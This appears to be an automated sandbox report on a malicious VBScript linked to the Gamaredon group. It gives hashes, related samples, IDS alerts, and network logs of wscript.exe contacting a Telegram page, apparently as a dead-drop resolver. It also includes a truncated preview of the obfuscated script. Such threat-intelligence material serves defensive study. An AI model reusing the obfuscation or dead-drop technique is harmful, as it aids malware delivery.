                                  SecuriteInfo.com.Trojan.Siggen19.36002.3443.8527.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                  • 149.154.167.220
                                  K1wEC5xsnP.exeGet hashmaliciousDCRatBrowse
                                  • 149.154.167.220
                                  yfySrYMRO8.exeGet hashmaliciousPrivateLoader, RedLineBrowse
                                  • 149.154.167.99
                                  w77T7XgLqj.exeGet hashmaliciousDCRatBrowse
                                  • 149.154.167.220
                                  SecuriteInfo.com.Win32.PWSX-gen.14895.4336.exeGet hashmaliciousAgentTeslaBrowse
                                  • 149.154.167.220
                                  download (17).vbsGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  Packing_List.xlam.xlsxGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 149.154.167.220
                                  INV.PDF.exeGet hashmaliciousDarkCloudBrowse
                                  • 149.154.167.220
                                  Rlgmwu.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 149.154.167.220
                                  Gk7dY3EsML.exeGet hashmaliciousUnknownBrowse
                                  • 95.161.76.100
                                  KEdK7cfRii.exeGet hashmaliciousGurcu StealerBrowse
                                  • 149.154.167.220
                                  Bon8RXwP7S.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.220
                                  Amend_Invoice____87975557667___pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 149.154.167.220
                                  New_Order_BSJ007.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 149.154.167.220
                                  Bgbei.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 149.154.167.220
                                  Dryswpzby.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 149.154.167.220
                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 149.154.167.220
                                  RKE2023000000853.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 149.154.167.220
                                  767667 ORDER NUMBER FOR ATEF GROUP OF COMPANIES-------------------------------PDF.batGet hashmaliciousAgentTeslaBrowse
                                  • 149.154.167.220
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37f463bf4616ecd445d4a1937da06e19iwVUU53nZE.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  PDFViewer_44882564 (1).msiGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  3 cahier Ile bleue 2023.xlsxGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  3 cahier Ile bleue 2023.xlsxGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  3 cahier Ile bleue 2023.xlsxGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  Orden_de_compra_-_P06672_PDF.exeGet hashmaliciousGuLoaderBrowse
                                  • 149.154.167.99
                                  download (17).vbsGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  N94307_251628_2023-08-28_BC8976924pdf.exeGet hashmaliciousGuLoaderBrowse
                                  • 149.154.167.99
                                  CC1eNsOCDq.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  OYGuDyAvhG.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  CC1eNsOCDq.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  cMBkG9Nme3.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  CVj3khKqLB.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  eB6bGbNNSH.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  CVj3khKqLB.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  cMBkG9Nme3.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  6srcaz6D6M.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  eB6bGbNNSH.exeGet hashmaliciousFabookieBrowse
                                  • 149.154.167.99
                                  No context
                                  No created / dropped files found
                                  File type:ASCII text, with CRLF line terminators
                                  Entropy (8bit):5.346804201618879
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:download (18).vbs
                                  File size:5'061 bytes
                                  MD5:d54f6ef2c2acb61b58a45e618d16f5f6
                                  SHA1:c92bf5d20884474cd18c6618e45cd960e9e2bfe4
                                  SHA256:f053bfb3c3d133ebff9a7b2b600b52299c255549571d754c52e9dacd6707707d
                                  SHA512:3459f8ebd2c786f4e5c53825015511259ee3f151e06db9d54c4aaa4d0ed7643e0ff9cae4103482999118a728934bc1db1091d4c2ef43860c801246963a423cac
                                  SSDEEP:96:ZDUzXD6/yvBEEwNgP0iNQX422wpUKMP//g+kBYDWRGTBg:ZDUzeE8YQrfUKM3/gZnaa
                                  TLSH:01A1D81FF9036E92827F5386821F3C09E7BCC061722B58937545F8AB45BAC754DC6D85
                                  File Content Preview:on error resume next..addYE1 = 1..do while addYE1 < 5..labourerknm 90..enforcecG9 = experimentVC1..ExecuteGlobal(enforcecG9) ..Loop..function loomk7e(soulC31, ponyr2D)..on error resume next..spurtd37 = soulC31..grandsoniRF = ponyr2D..Set dissolveSu4 = Ge
                                  Icon Hash:68d69b8f86ab9a86

                                  Download Network PCAP: filteredfull

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.38.8.8.856157532046128 08/29/23-15:35:23.605876UDP2046128ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru)5615753192.168.2.38.8.8.8
                                  192.168.2.38.8.8.853304532046128 08/29/23-15:33:07.083148UDP2046128ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru)5330453192.168.2.38.8.8.8
                                  192.168.2.38.8.8.853493532046128 08/29/23-15:35:23.745784UDP2046128ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru)5349353192.168.2.38.8.8.8
                                  192.168.2.38.8.8.855108532046128 08/29/23-15:33:07.228017UDP2046128ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru)5510853192.168.2.38.8.8.8
                                  • Total Packets: 48
                                  • 443 (HTTPS)
                                  • 80 (HTTP)
                                  • 53 (DNS)
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 29, 2023 15:33:06.371023893 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.371073008 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.371193886 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.382596016 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.382622957 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.446855068 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.447050095 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.661669016 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.661698103 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.662148952 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.662219048 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.664402962 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.697457075 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.697551966 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.697643995 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.697669983 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.701288939 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.701313019 CEST44349756149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.701325893 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.701401949 CEST49756443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.749509096 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.749556065 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.749656916 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.750216007 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.750231028 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.816966057 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.817070007 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.818125963 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.818149090 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.823527098 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.823545933 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.896894932 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.896939039 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.896996021 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.897036076 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:06.897131920 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.897196054 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.898451090 CEST49758443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:33:06.898485899 CEST44349758149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:33:22.075870991 CEST4975980192.168.2.3212.18.104.89
                                  Aug 29, 2023 15:33:25.081327915 CEST4975980192.168.2.3212.18.104.89
                                  Aug 29, 2023 15:33:31.081749916 CEST4975980192.168.2.3212.18.104.89
                                  Aug 29, 2023 15:35:23.081027985 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.081139088 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.081249952 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.082016945 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.082046986 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.146766901 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.146971941 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.147902012 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.147928953 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.151710033 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.151732922 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.202842951 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.203020096 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.203057051 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.203135014 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.203135014 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.203202963 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.203324080 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.203324080 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.203358889 CEST44349763149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.203423023 CEST49763443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.205107927 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.205190897 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.205301046 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.205771923 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.205806017 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.272119999 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.272265911 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.272789001 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.272809982 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.275434971 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.275471926 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.339518070 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.339607954 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.339715004 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.339775085 CEST44349764149.154.167.99192.168.2.3
                                  Aug 29, 2023 15:35:23.339798927 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.339798927 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.339798927 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.339853048 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.340298891 CEST49764443192.168.2.3149.154.167.99
                                  Aug 29, 2023 15:35:23.340334892 CEST44349764149.154.167.99192.168.2.3
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 29, 2023 15:33:06.346657038 CEST6176953192.168.2.38.8.8.8
                                  Aug 29, 2023 15:33:06.361593962 CEST53617698.8.8.8192.168.2.3
                                  TimestampSource IPDest IPChecksumCodeType
                                  Aug 29, 2023 15:33:07.343084097 CEST192.168.2.3212.18.104.894d5aEcho
                                  Aug 29, 2023 15:33:07.512053013 CEST212.18.104.89192.168.2.3555aEcho Reply
                                  Aug 29, 2023 15:35:23.769707918 CEST192.168.2.3212.18.104.894d59Echo
                                  Aug 29, 2023 15:35:23.938709974 CEST212.18.104.89192.168.2.35559Echo Reply
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Aug 29, 2023 15:33:06.346657038 CEST192.168.2.38.8.8.80x231eStandard query (0)t.meA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Aug 29, 2023 15:33:06.361593962 CEST8.8.8.8192.168.2.30x231eNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                  • t.me
                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.349756149.154.167.99443C:\Windows\System32\wscript.exe
                                  TimestampkBytes transferredDirectionData
                                  2023-08-29 13:33:06 UTC0OUTPOST /s/rwmlqlxfttee HTTP/1.1
                                  Accept: */*
                                  Accept-Language: en-us
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: t.me
                                  Content-Length: 0
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  2023-08-29 13:33:06 UTC0INHTTP/1.1 302 Found
                                  Server: nginx/1.18.0
                                  Date: Tue, 29 Aug 2023 13:33:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: close
                                  Set-Cookie: stel_ssid=de08e3f70d91333e83_15118461779691697602; expires=Wed, 30 Aug 2023 13:33:06 GMT; path=/; samesite=None; secure; HttpOnly
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Location: https://t.me/rwmlqlxfttee
                                  Strict-Transport-Security: max-age=35768000


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.349758149.154.167.99443C:\Windows\System32\wscript.exe
                                  TimestampkBytes transferredDirectionData
                                  2023-08-29 13:33:06 UTC0OUTGET /rwmlqlxfttee HTTP/1.1
                                  Accept: */*
                                  Accept-Language: en-us
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: t.me
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Cookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
                                  2023-08-29 13:33:06 UTC1INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Tue, 29 Aug 2023 13:33:06 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 9617
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                  Strict-Transport-Security: max-age=35768000
                                  2023-08-29 13:33:06 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 72 77 6d 6c 71 6c 78 66 74 74 65 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @rwmlqlxfttee</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.349763149.154.167.99443C:\Windows\System32\wscript.exe
                                  TimestampkBytes transferredDirectionData
                                  2023-08-29 13:35:23 UTC10OUTPOST /s/rwmlqlxfttee HTTP/1.1
                                  Accept: */*
                                  Accept-Language: en-us
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: t.me
                                  Content-Length: 0
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Cookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
                                  2023-08-29 13:35:23 UTC11INHTTP/1.1 302 Found
                                  Server: nginx/1.18.0
                                  Date: Tue, 29 Aug 2023 13:35:23 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Location: https://t.me/rwmlqlxfttee
                                  Strict-Transport-Security: max-age=35768000


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.349764149.154.167.99443C:\Windows\System32\wscript.exe
                                  TimestampkBytes transferredDirectionData
                                  2023-08-29 13:35:23 UTC11OUTGET /rwmlqlxfttee HTTP/1.1
                                  Accept: */*
                                  Accept-Language: en-us
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: t.me
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Cookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
                                  2023-08-29 13:35:23 UTC12INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Tue, 29 Aug 2023 13:35:23 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 9617
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                  Strict-Transport-Security: max-age=35768000
                                  2023-08-29 13:35:23 UTC12INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 72 77 6d 6c 71 6c 78 66 74 74 65 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @rwmlqlxfttee</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                  050100150200s020406080100

                                  Click to jump to process

                                  050100150200s0.005101520MB

                                  Click to jump to process

                                  • File
                                  • Registry

                                  Click to dive into process behavior distribution

                                  Target ID:0
                                  Start time:15:31:26
                                  Start date:29/08/2023
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download (18).vbs"
                                  Imagebase:0x7ff673440000
                                  File size:163'840 bytes
                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false
                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                  No disassembly